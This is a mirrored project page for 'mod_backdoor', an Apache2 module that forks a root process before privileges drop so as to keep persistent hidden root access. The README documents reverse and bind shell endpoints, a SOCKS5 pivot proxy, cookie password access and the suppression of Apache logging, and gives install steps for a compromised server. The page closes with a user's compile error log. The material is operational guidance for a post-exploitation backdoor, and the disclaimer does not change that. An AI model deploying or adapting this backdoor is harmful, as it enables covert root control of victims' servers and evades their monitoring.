Code Monkey home page Code Monkey logo

apache2_backdoormod's Introduction

Apache2 mod_backdoor

mod_backdoor is a stealth backdoor using an Apache2 module.
The main idea is to fork() the primary Apache2 process just after it has loaded its config. Since it's forked before the root user transfers the process to www-data, you can execute command as root.
As Apache2 loads its configuration only when you (re)start it, the challenge was to never let die this forked root apache2 process, to let us interact as root with the compromised system.

Features

  • Bind TTY Shell
  • Reverse Shell (TTY , Native, PHP, Perl, Python, Ruby)
  • High stability and reliability, each shell spawns a new forked independent root process attached to PID 1 and removed from apache2 cgroup
  • Socks5 proxy
  • Password Protection through cookie headers
  • Ping module to know if its still active
  • Bypass logging mechanism. Each request to the backdoor module are not logged by Apache2.
  • Works on systemd systems, but should also work with init-like systems (with some adjustements, explained in Description section).

Demo

asciicast

Description

  • The password is send through Cookie headers: Cookie: password=backdoor. It's defined with #define in the beginning of mod_backdoor.c, so you could easily edit it.

  • Each following requests must contain this password to interact with the module.

  • Each request containing this cookie will not be logged by Apache if the module is running.

  • Each shell spawns attached to PID 1 and is removed from apache2 cgroup. It means it's possible to restart/stop apache2.service from a spawned shell (not true for TTY shells because an apache2 process is needed to do the bidirectional communication between socket and pty). It also improves stealth, shells are no longer related to apache2.service.

  • IPC socket is stored in the private /tmp folder provided by systemd service (by default).

On non-systemd systems, it should work aswell. The main differences are, with systemd, the IPC socket is stored in a private /tmp/.
This private /tmp is automatically cleaned up when apache2 <stop || restart>. Systemd automatically kills all instance of apache2 when you ask for a <stop || restart> .

This is not the same behavior with init-like systems. There isn't private /tmp for the application, so the IPC socket is created in the public /tmp.
The init service script doesn't know the PID of the forked root apache2 process, so our root process will not be killed by the script.
It means apache2 won't restart automatically because there is already a process listening on port 80 (our root process). And if you kill it manually, the forked root apache2 process won't bind to IPC socket because it tries to create another one on the same place (I've not handled the error \o/ ).

The workaround I've found is to replace the /var/run/apache2/apache2.pid with the PID of our forked root apache2 process and save the original one.
Doing so, it allows catching signal for a process you don't own:
--> Overwrite signal handler for SIGTERM / SIGKILL in order to :

  • Remove IPC socket
  • Remove cgroup2 folder
  • Put original PID in /var/run/apache2/apache2.pid
  • Call apachectl stop to simulate the original behavior of the init script.
  • Exit our forked root apache2 process

The path /var/run/apache2/apache2.pid is stored in the environment variable: APACHE_PID_FILE

If you have a better idea for init-like system, feel free to contact me (or PR) !

The apache2 server needs to be compiled with the mod_so to allow Dynamic Shared Object (DSO) support.

Bind TTY Shell

The endpoint ย http[s]://<TARGET>/bind/<PORT> binds a listening port on <TARGET>:<PORT>
When a connection is initiated to the listening port, the port closes.
forkpty() is used to obtain a native TTY shell, working with an IPC UNIX socket to communicate between forked TTY process and the new socket you just opened.
Shells could be easily upgraded with the famous trick:
CTRL-Z --> stty raw -echo --> fg --> reset

Reverse TTY Shell

It works like the bind shell, the endpoint http[s]://<TARGET>/revtty/<IP>/<PORT> returns a TTY shell to <IP>:<PORT>

Reverse Shell (No TTY)

The endpoint http[s]://<TARGET>/reverse/<IP>/<PORT>/<PROG> returns a shell to <IP>:<PORT>.
<PROG> must be one of these:

Native External
sh php
bash python
dash ruby
ash perl
tcsh
ksh

<PROG> must be in lower-case.
PHP uses the exec function.
Ruby isn't using /bin/sh.

Socks5 proxy

Source code comes from https://github.com/rofl0r/microsocks
The endpoint http[s]://<TARGET>/proxy/<PORT>/<USER> opens a socks5 proxy on <PORT>. <USER> is optional. If you set it, it activates the auth mode. Password is the same as the mod_backdoor.
Once a specific ip address authed successfully with user:pass, it is added to a whitelist and may use the proxy without auth. This is handy for programs like firefox that don't support user:pass auth.
For it to work you'd basically make one connection with another program that supports it, and then you can use firefox too.
Example:

  1. curl -H 'Cookie: password=backdoor' http://<TARGET>/proxy/1337/vlad
    --> Start socks proxy on port 1337 for vlad user
  2. curl -x socks5://vlad:password=backdoor@<TARGET>:1337 https://www.google.com
    --> Register your IP address
  3. You could now use it without auth
  4. When you're done, you can kill the socks proxy by sending imdonewithyou in a socket
    --> echo "imdonewithyou" | nc <TARGET> 1337

Ping module

The endpoint http[s]://<TARGET>/ping tells you if the module is currently working.

Notes

Apache2 Module Backdoor is inspired from Ringbuilder, created by Juan Manuel Fernandez (@TheXC3LL)
More info about Ringbuilder:
https://github.com/TarlogicSecurity/mod_ringbuilder
https://www.tarlogic.com/en/blog/backdoors-modulos-apache/

Socks5 code was adapted from https://github.com/rofl0r/microsocks

Special thanks to @Ug_0Security

Builds

For development :

  • apxs -i -a -c mod_backdoor.c sblist.c sblist_delete.c server.c -Wl,-lutil
    -Wl,-lutil used to link mod_backdoor.so with libutil.so to use forkpty() from <pty.h>
  • systemctl restart apache2

On a compromised server :

  • Compile it for the desired arch and retrieve the mod_backdoor.so or
    get it from the build/ folder (compiled for: Apache/2.4.41 (Debian)).
  • Copy mod_backdoor.so to /usr/lib/apache2/modules/mod_backdoor.so
  • Copy backdoor.load to /etc/apache2/mod-available/backdoor.load
  • a2enmod backdoor --> systemctl restart apache2

Author

Vlad Rico (@RicoVlad)

Disclaimer

This project was created only for learning purpose.
Usage of mod_backdoor for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

apache2_backdoormod's People

Contributors

vladrico avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar

apache2_backdoormod's Issues

Question

is this available for windows server?

Failed to compile on Apache/2.2.3 (Linux/SUSE)

Hi,
Im strugglling to compile the apache backdoor on OpenSUSE 10.2 Runing Apache 2.2.3

root-2:/var/www/html/ # apxs2 -i -a -c mod_backdoor.c sblist.c sblist_delete.c server.c -Wl,-lutil

/usr/lib64/apr-1/build/libtool --silent --mode=compile gcc -prefer-pic -O2 -fmessage-length=0 -Wall -D_FORTIFY_SOURCE=2 -g -fPIC -Wall -fno-strict-aliasing -DLDAP_DEPRECATED  -DLINUX=2 -D_REENTRANT -D_GNU_SOURCE -DAP_DEBUG -pthread -I/usr/include/apache2  -I/usr/include/apr-1   -I/usr/include/apr-1   -c -o mod_backdoor.lo mod_backdoor.c && touch mod_backdoor.slo
In file included from mod_backdoor.c:43:
mod_backdoor.h:17: error: redefinition of typedef 'apr_socket_t'
/usr/include/apr-1/apr_network_io.h:190: error: previous declaration of 'apr_socket_t' was here
In file included from mod_backdoor.c:43:
mod_backdoor.h:21:41: warning: no newline at end of file
mod_backdoor.c:47:1: warning: "_GNU_SOURCE" redefined
<command line>:1:1: warning: this is the location of the previous definition
mod_backdoor.c:48:1: warning: "_POSIX_C_SOURCE" redefined
In file included from /usr/include/sys/types.h:27,
                 from mod_backdoor.c:11:
/usr/include/features.h:154:1: warning: this is the location of the previous definition
In file included from mod_backdoor.c:51:
server.h:11: warning: ignoring #pragma RcB2 DEP
In file included from mod_backdoor.c:52:
sblist.h:90: warning: ignoring #pragma RcB2 DEP
mod_backdoor.c: In function 'send_auth_response':
mod_backdoor.c:268: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c: In function 'send_error':
mod_backdoor.c:275: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c: In function 'clientthread':
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of 'strlen' differ in signedness
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of 'strlen' differ in signedness
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of '__builtin_strcmp' differ in signedness
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of 'strlen' differ in signedness
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of '__builtin_strcmp' differ in signedness
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of '__builtin_strcmp' differ in signedness
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of '__builtin_strcmp' differ in signedness
mod_backdoor.c:341: warning: pointer targets in passing argument 1 of 'strncmp' differ in signedness
mod_backdoor.c: In function 'shell':
mod_backdoor.c:470: warning: unused variable 'buf'
mod_backdoor.c:469: warning: unused variable 'sr'
mod_backdoor.c:469: warning: unused variable 'n'
mod_backdoor.c:475: warning: ignoring return value of 'pipe', declared with attribute warn_unused_result
mod_backdoor.c:476: warning: ignoring return value of 'pipe', declared with attribute warn_unused_result
mod_backdoor.c: In function 'shellPTY':
mod_backdoor.c:626: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:636: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c: In function 'bindPort':
mod_backdoor.c:656: error: 'SO_REUSEPORT' undeclared (first use in this function)
mod_backdoor.c:656: error: (Each undeclared identifier is reported only once
mod_backdoor.c:656: error: for each function it appears in.)
mod_backdoor.c:663: warning: unused variable 'serverlen'
mod_backdoor.c:652: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:669: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:674: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c: In function 'bicomIPC':
mod_backdoor.c:714: warning: 'return' with no value, in function returning non-void
mod_backdoor.c:700: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:709: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c: In function 'backdoor_post_read_request':
mod_backdoor.c:830: warning: unused variable 'i'
mod_backdoor.c:830: warning: unused variable 'sd'
mod_backdoor.c:829: warning: unused variable 'buf'
mod_backdoor.c:721: warning: unused variable 'tv'
mod_backdoor.c:719: warning: unused variable 'readset'
mod_backdoor.c:718: warning: unused variable 'sr'
mod_backdoor.c:718: warning: unused variable 'n'
mod_backdoor.c:757: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:764: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:768: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:770: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:782: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:790: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:800: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:816: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:823: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:833: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:840: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:844: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:851: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:866: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:881: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:888: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:895: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:900: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c:904: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c: In function 'rmCgroup':
mod_backdoor.c:930: warning: passing argument 4 of 'mount' makes integer from pointer without a cast
mod_backdoor.c:923: warning: unused variable 'thisPID'
mod_backdoor.c:939: warning: ignoring return value of 'write', declared with attribute warn_unused_result
mod_backdoor.c: In function 'backdoor_post_config':
mod_backdoor.c:1034: warning: unused variable 'readfds'
mod_backdoor.c:1033: warning: unused variable 'buf'
mod_backdoor.c:1031: warning: unused variable 'sr'
apxs:Error: Command failed with rc=65536

Any help will be appreciated.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.